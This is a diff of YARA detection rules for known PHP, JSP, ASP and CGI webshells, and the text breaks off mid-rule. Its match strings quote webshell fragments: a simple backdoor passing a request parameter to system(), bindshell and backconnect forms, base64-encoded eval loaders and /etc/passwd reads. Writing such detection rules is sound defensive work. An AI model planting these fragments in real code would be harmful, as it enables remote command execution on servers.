-		hash = "0fdb401a49fc2e481e3dfd697078334b"
-		logic_hash = "cdd105f36593e8326ca32bf7cf1fba6fb754e7305c91fe6c078323db8f59b23c"
+		hash = "c05b5deecfc6de972aa4652cb66da89cfb3e1645"
+		logic_hash = "572b026545b012951136bdb9b1101e38f27bc3321b895799bc853ea1190877f9"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "echo \"fichier telecharge dans \".good_link(\"./\".$_FILES[\"fic\"][\"na"
-		$s2 = "if(move_uploaded_file($_FILES[\"fic\"][\"tmp_name\"],good_link(\"./\".$_FI"
-		$s3 = "echo \"Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s"
+		$s0 = "<title>Webcommander at <?=$_SERVER[\"HTTP_HOST\"]?></title>" fullword
+		$s2 = "/* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */" fullword
+		$s5 = "<form action=<?=$script?>?act=bindshell method=POST>" fullword
+		$s9 = "<form action=<?=$script?>?act=backconnect method=POST>" fullword
+		$s11 = "<form action=<?=$script?>?act=mkdir method=POST>" fullword
+		$s16 = "die(\"<font color=#DF0000>Login error</font>\");" fullword
+		$s20 = "<b>Bind /bin/bash at port: </b><input type=text name=port size=8>" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Phpjackal_Php
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Matamu
 {
 	meta:
-		description = "Semi-Auto-generated  - file phpjackal.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ae46cb97-1ff8-50ba-856f-c38fbb1e5163"
+		description = "PHP Webshells Github Archive - file matamu.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4720-L4731"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5932-L5948"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ab230817bcc99acb9bdc0ec6d264d76f"
-		logic_hash = "6e2ff262aecd08e5feaa274a7fd128d75565d6cc03341da7cbeb2949070705e5"
+		hash = "d477aae6bd2f288b578dbf05c1c46b3aaa474733"
+		logic_hash = "c0101dab5fe7c3a2652b2e23e1ef0274364137895a402a0367c6b5474c0e8a1f"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "$dl=$_REQUEST['downloaD'];"
-		$s4 = "else shelL(\"perl.exe $name $port\");"
+		$s2 = "$command .= ' -F';" fullword
+		$s3 = "/* We try and match a cd command. */" fullword
+		$s4 = "directory... Trust me - it works :-) */" fullword
+		$s5 = "$command .= \" 1> $tmpfile 2>&1; \" ." fullword
+		$s10 = "$new_dir = $regs[1]; // 'cd /something/...'" fullword
+		$s16 = "/* The last / in work_dir were the first charecter." fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Sql_Php_Php
+rule SIGNATURE_BASE_Webshell_Ru24_Post_Sh
 {
 	meta:
-		description = "Semi-Auto-generated  - file sql.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "41730336-0dce-5ed9-95b0-c911a4e3cb48"
+		description = "PHP Webshells Github Archive - file ru24_post_sh.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "86a45d72-c42d-58d5-9969-d3ebfc22853d"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4732-L4744"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5949-L5964"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8334249cbb969f2d33d678fec2b680c5"
-		logic_hash = "875bdaa0072f869c983526d0aab20b4faa9187a3f32b8024658114a4c908b825"
+		hash = "d2c18766a1cd4dda928c12ff7b519578ccec0769"
+		logic_hash = "6cf15a67c311979d32edfb443701cef34ee32d7a672314fc7b60b262b6b2c402"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "fputs ($fp, \"# RST MySQL tools\\r\\n# Home page: http://rst.void.ru\\r\\n#"
-		$s2 = "http://rst.void.ru"
-		$s3 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
+		$s1 = "http://www.ru24-team.net" fullword
+		$s4 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
+		$s6 = "Ru24PostWebShell"
+		$s7 = "Writed by DreAmeRz" fullword
+		$s9 = "$function=passthru; // system, exec, cmd" fullword
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Cgi_Python_Py
+rule SIGNATURE_BASE_Webshell_Hiddens_Shell_V1
 {
 	meta:
-		description = "Semi-Auto-generated  - file cgi-python.py.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "75e99d10-3cdf-5f87-9933-4ce5ebe18b09"
+		description = "PHP Webshells Github Archive - file hiddens shell v1.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7194998e-c84c-5f59-92fe-857ecf7e8e88"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4745-L4757"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5965-L5976"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0a15f473e2232b89dae1075e1afdac97"
-		logic_hash = "37c6c7db32a52c8a83ff85f0a50c6fa71e833b9e6d20b1f95e9512fe8bbd0aee"
+		hash = "1674bd40eb98b48427c547bf9143aa7fbe2f4a59"
+		logic_hash = "b76400c320e6294b0c831fbbb8e08a9d2097fbb027065f9c4b496d4b005ba016"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "a CGI by Fuzzyman"
-		$s1 = "\"\"\"+fontline +\"Version : \" + versionstring + \"\"\", Running on : \"\"\" + "
-		$s2 = "values = map(lambda x: x.value, theform[field])     # allows for"
+		$s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Ru24_Post_Sh_Php_Php
+rule SIGNATURE_BASE_Webshell_C99_Madnet
 {
 	meta:
-		description = "Semi-Auto-generated  - file ru24_post_sh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "78669d3e-629b-591a-a766-923e37d1fdba"
+		description = "PHP Webshells Github Archive - file c99_madnet.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f2b9c3d1-1c55-59cb-a9bf-8b4011f86a3b"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4758-L4770"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5977-L5992"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5b334d494564393f419af745dc1eeec7"
-		logic_hash = "e81e5345bbe07ca85c94a3d8411f0dd3c418689ccae7115c098f718f9093b3bf"
+		hash = "17613df393d0a99fd5bea18b2d4707f566cff219"
+		logic_hash = "cd4048f28405f106302643656ae5f8a257aaec0184a8057a9dffbda9bb857027"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<title>Ru24PostWebShell - \".$_POST['cmd'].\"</title>" fullword
-		$s3 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
-		$s4 = "Writed by DreAmeRz" fullword
+		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword
+		$s1 = "eval(gzinflate(base64_decode('"
+		$s2 = "$pass = \"pass\";  //Pass" fullword
+		$s3 = "$login = \"user\"; //Login" fullword
+		$s4 = "             //Authentication" fullword
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Dtool_Pro_Php
+rule SIGNATURE_BASE_Webshell_C99_Locus7S
 {
 	meta:
-		description = "Semi-Auto-generated  - file DTool Pro.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "c02c522c-8418-5760-869a-52b41785bebc"
+		description = "PHP Webshells Github Archive - file c99_locus7s.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f92fe5a2-e465-56ed-a77b-b32ea4c2c105"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4771-L4783"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5993-L6008"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "366ad973a3f327dfbfb915b0faaea5a6"
-		logic_hash = "e8f8b4ca2ab4607e700e897671fd230280763a70897b8ccfc31b3bcb7f2a1f4a"
+		hash = "d413d4700daed07561c9f95e1468fb80238fbf3c"
+		logic_hash = "5ecfc5f6da471bd3037228c0bc762d50762933af3cf6674210c7b2017a45a646"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "r3v3ng4ns\\nDigite"
-		$s1 = "if(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: It seems that the permissi"
-		$s3 = "if (empty($cmd) and $ch_msg==\"\") echo (\"Comandos Exclusivos do DTool Pro\\n"
+		$s8 = "$encoded = base64_encode(file_get_contents($d.$f)); " fullword
+		$s9 = "$file = $tmpdir.\"dump_\".getenv(\"SERVER_NAME\").\"_\".$db.\"_\".date(\"d-m-Y"
+		$s10 = "else {$tmp = htmlspecialchars(\"./dump_\".getenv(\"SERVER_NAME\").\"_\".$sq"
+		$s11 = "$c99sh_sourcesurl = \"http://locus7s.com/\"; //Sources-server " fullword
+		$s19 = "$nixpwdperpage = 100; // Get first N lines from /etc/passwd " fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Telnetd_Pl
+rule SIGNATURE_BASE_Webshell_Jspwebshell_1_2
 {
 	meta:
-		description = "Semi-Auto-generated  - file telnetd.pl.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "05b5d247-3133-5902-a2ee-b84fa89c7f32"
+		description = "PHP Webshells Github Archive - file JspWebshell_1.2.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dfd8c88d-4fe2-5786-9d71-65dba525c358"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4784-L4798"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6009-L6025"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5f61136afd17eb025109304bd8d6d414"
-		logic_hash = "faf21758b311fa4c2d11cd60169e6c9a67282cf739b73664456691361a480419"
+		hash = "0bed4a1966117dd872ac9e8dceceb54024a030fa"
+		logic_hash = "13e696c1c671d7fda832c84f150e3f41ed55bf888c4bebfeb06ea68d6be65527"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "0ldW0lf" fullword
-		$s1 = "However you are lucky :P"
-		$s2 = "I'm FuCKeD"
-		$s3 = "ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#"
-		$s4 = "atrix@irc.brasnet.org"
+		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
+		$s1 = "String password=request.getParameter(\"password\");" fullword
+		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
+		$s7 = "String editfile=request.getParameter(\"editfile\");" fullword
+		$s8 = "//String tempfilename=request.getParameter(\"file\");" fullword
+		$s12 = "password = (String)session.getAttribute(\"password\");" fullword
 
 	condition:
-		1 of them
+		3 of them
 }
-rule SIGNATURE_BASE_Php_Include_W_Shell_Php
+rule SIGNATURE_BASE_Webshell_Safe0Ver
 {
 	meta:
-		description = "Semi-Auto-generated  - file php-include-w-shell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ddcf9031-2ec8-5a86-8326-60e4a699f494"
+		description = "PHP Webshells Github Archive - file safe0ver.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a7fc8c89-f7a1-5958-823a-763dedb3066d"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4799-L4810"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6026-L6043"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4e913f159e33867be729631a7ca46850"
-		logic_hash = "a63910d97b7ef447b2cadb7de12943d3dbb6eada27d3097b8acf58d9b65b6f60"
+		hash = "366639526d92bd38ff7218b8539ac0f154190eb8"
+		logic_hash = "ae5de63b79804cf8c99bc5ea0c8862cf05e4085451d2b516cf95565bf32f3876"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$dataout .= \"<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd"
-		$s1 = "if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB"
+		$s3 = "$scriptident = \"$scriptTitle By Evilc0der.com\";" fullword
+		$s4 = "while (file_exists(\"$lastdir/newfile$i.txt\"))" fullword
+		$s5 = "else { /* <!-- Then it must be a File... --> */" fullword
+		$s7 = "$contents .= htmlentities( $line ) ;" fullword
+		$s8 = "<br><p><br>Safe Mode ByPAss<p><form method=\"POST\">" fullword
+		$s14 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
+		$s20 = "/* <!-- End of Actions --> */" fullword
 
 	condition:
-		1 of them
+		3 of them
 }
-rule SIGNATURE_BASE_Safe0Ver_Shell__Safe_Mod_Bypass_By_Evilc0Der_Php
+rule SIGNATURE_BASE_Webshell_Uploader
 {
 	meta:
-		description = "Semi-Auto-generated  - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "25971f62-33ee-5ed6-8d72-118be5bd2deb"
+		description = "PHP Webshells Github Archive - file Uploader.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c68e15d9-865e-5269-a91c-00619fe76305"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4811-L4823"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6044-L6055"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6163b30600f1e80d2bb5afaa753490b6"
-		logic_hash = "46f6bb38f1175e02b03047c06a7aed968b1c1ce2e28cc4b88e15703040e91592"
+		hash = "e216c5863a23fde8a449c31660fd413d77cce0b7"
+		logic_hash = "c4b915f60a952131caa2c4f5bb2eea85ef25f27cabb8ad36a6bb928433558954"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Safe0ver" fullword
-		$s1 = "Script Gecisi Tamamlayamadi!"
-		$s2 = "document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%"
+		$s1 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Shell_Php_Php
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Kral
 {
 	meta:
-		description = "Semi-Auto-generated  - file shell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "eaf243cb-fa26-5f34-a724-60a08acff636"
+		description = "PHP Webshells Github Archive - file kral.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4824-L4836"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6056-L6072"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1a95f0163b6dea771da1694de13a3d8d"
-		logic_hash = "dbd08e71dc512f8dcf009150fb4448cd3608291ef9078c7e6b86e6f8d820bd94"
+		hash = "4cd1d1a2fd448cecc605970e3a89f3c2e5c80dfc"
+		logic_hash = "0aded226f4e54c0169b9fbda91458f581ea47f9f8bda61a350b5e6f8b60931f3"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "/* We have found the parent dir. We must be carefull if the parent " fullword
-		$s2 = "$tmpfile = tempnam('/tmp', 'phpshell');"
-		$s3 = "if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {" fullword
+		$s1 = "$adres=gethostbyname($ip);" fullword
+		$s3 = "curl_setopt($ch,CURLOPT_POSTFIELDS,\"domain=\".$site);" fullword
+		$s4 = "$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";" fullword
+		$s16 = "echo $son.' <br> <font color=\"green\">Access</font><br>';" fullword
+		$s17 = "<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">BLaSTER</a><br /"
+		$s20 = "<p><strong>Server listeleyici</strong><br />" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Telnet_Cgi
+rule SIGNATURE_BASE_Webshell_Cgitelnet
 {
 	meta:
-		description = "Semi-Auto-generated  - file telnet.cgi.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "4ca3dace-cd80-58e4-a4de-47dcc64dac0e"
+		description = "PHP Webshells Github Archive - file cgitelnet.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b02d8549-ebfe-522c-9a6d-8657273da3ed"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4837-L4849"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6073-L6087"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "dee697481383052980c20c48de1598d1"
-		logic_hash = "689c1d43c64aa7469989686c60fc9ab46acde42fdf3c1157bae1e2b8373c845f"
+		hash = "72e5f0e4cd438e47b6454de297267770a36cbeb3"
+		logic_hash = "e9b7096d5a19c9d5423bbfe125ae0347853919ab092efa98f0687a5d0cf68953"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "W A R N I N G: Private Server"
-		$s2 = "print \"Set-Cookie: SAVEDPWD=;\\n\"; # remove password cookie"
-		$s3 = "$Prompt = $WinNT ? \"$CurrentDir> \" : \"[admin\\@$ServerName $C"
+		$s9 = "# Author Homepage: http://www.rohitab.com/" fullword
+		$s10 = "elsif($Action eq \"command\") # user wants to run a command" fullword
+		$s18 = "# in a command line on Windows NT." fullword
+		$s20 = "print \"Transfered $TargetFileSize Bytes.<br>\";" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Ironshell_Php
+rule SIGNATURE_BASE_Webshell_Simple_Backdoor_2
 {
 	meta:
-		description = "Semi-Auto-generated  - file ironshell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "0d63ad03-4d1d-535f-8afe-3edaf1bf4010"
+		description = "PHP Webshells Github Archive - file simple-backdoor.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "faddd38e-d0c6-5299-9983-53351af1ece5"
 		date = "2025-03-29"
 		modified = "2025-03-29"
+		old_rule_name = "WebShell_simple_backdoor"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4850-L4864"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6088-L6108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8bfa2eeb8a3ff6afc619258e39fded56"
-		logic_hash = "23574299ee2bb33c3f71102adf71ac8f09b6f8ece5f798beacb9b2432d297ee7"
+		hash = "edcd5157a68fa00723a506ca86d6cbb8884ef512"
+		logic_hash = "655e445e51ec0f1bdce006a72acf3bce95941a349c279c14768760fa9f6f9d76"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "www.ironwarez.info"
-		$s1 = "$cookiename = \"wieeeee\";"
-		$s2 = "~ Shell I"
-		$s3 = "www.rootshell-team.info"
-		$s4 = "setcookie($cookiename, $_POST['pass'], time()+3600);"
+		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
+		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
+		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+		$s3 = "        echo \"</pre>\";" fullword
+		$s4 = "        $cmd = ($_REQUEST['cmd']);" fullword
+		$s5 = "        echo \"<pre>\";" fullword
+		$s6 = "if(isset($_REQUEST['cmd'])){" fullword
+		$s7 = "        die;" fullword
+		$s8 = "        system($cmd);" fullword
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Backdoorfr_Php
+rule SIGNATURE_BASE_Webshell_Safe_Mode_Bypass_PHP_4_4_2_And_PHP_5_1_2_2
 {
 	meta:
-		description = "Semi-Auto-generated  - file backdoorfr.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "5ba2b617-a873-5e80-9cfc-c61cc8d605f3"
+		description = "PHP Webshells Github Archive - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a504442f-85f2-55a1-8a07-1e0faccf8bc0"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4865-L4876"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6109-L6123"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "91e4afc7444ed258640e85bcaf0fecfc"
-		logic_hash = "40a6fb41a65fd35acb7cdc36fdda90f5dc54b641adc3ba9eaae29c5e46622206"
+		hash = "8fdd4e0e87c044177e9e1c97084eb5b18e2f1c25"
+		logic_hash = "fbe1f77e00fbc4e58cbad564e2d96c0381765ac799dfdf6cc2580428c68f97a5"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan"
-		$s2 = "print(\"<br>Provenance du mail : <input type=\\\"text\\\" name=\\\"provenanc"
+		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
+		$s3 = "xb5@hotmail.com</FONT></CENTER></B>\");" fullword
+		$s4 = "$v = @ini_get(\"open_basedir\");" fullword
+		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Aspydrv_Asp
+rule SIGNATURE_BASE_Webshell_Ntdaddy_V1_9
 {
 	meta:
-		description = "Semi-Auto-generated  - file aspydrv.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "4420d13e-7015-5083-ba08-b41bf28b00c2"
+		description = "PHP Webshells Github Archive - file NTDaddy v1.9.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a175fd28-5dc2-5827-87f0-4117e889e90e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4877-L4890"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6124-L6138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1c01f8a88baee39aa1cebec644bbcb99"
-		logic_hash = "64912d7521d4bff33b5f3a78525bf4ed94246f5933753bed7ca02bedffc85f0f"
-		score = 60
+		hash = "79519aa407fff72b7510c6a63c877f2e07d7554b"
+		logic_hash = "fdf8b4bb4980e588ad5ccee2d047660980d39f38617f887c5762dcdb0b858267"
+		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))"
-		$s1 = "password"
-		$s2 = "session(\"shagman\")="
+		$s2 = "|     -obzerve : mr_o@ihateclowns.com |" fullword
+		$s6 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword
+		$s13 = "<form action=ntdaddy.asp method=post>" fullword
+		$s17 = "response.write(\"<ERROR: THIS IS NOT A TEXT FILE>\")" fullword
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Cmdjsp_Jsp
+rule SIGNATURE_BASE_Webshell_Lamashell
 {
 	meta:
-		description = "Semi-Auto-generated  - file cmdjsp.jsp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "048478a8-9622-54c7-80ed-e4e223d14500"
+		description = "PHP Webshells Github Archive - file lamashell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "60e39eed-baa2-5999-8560-0a0242ce2608"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4891-L4904"
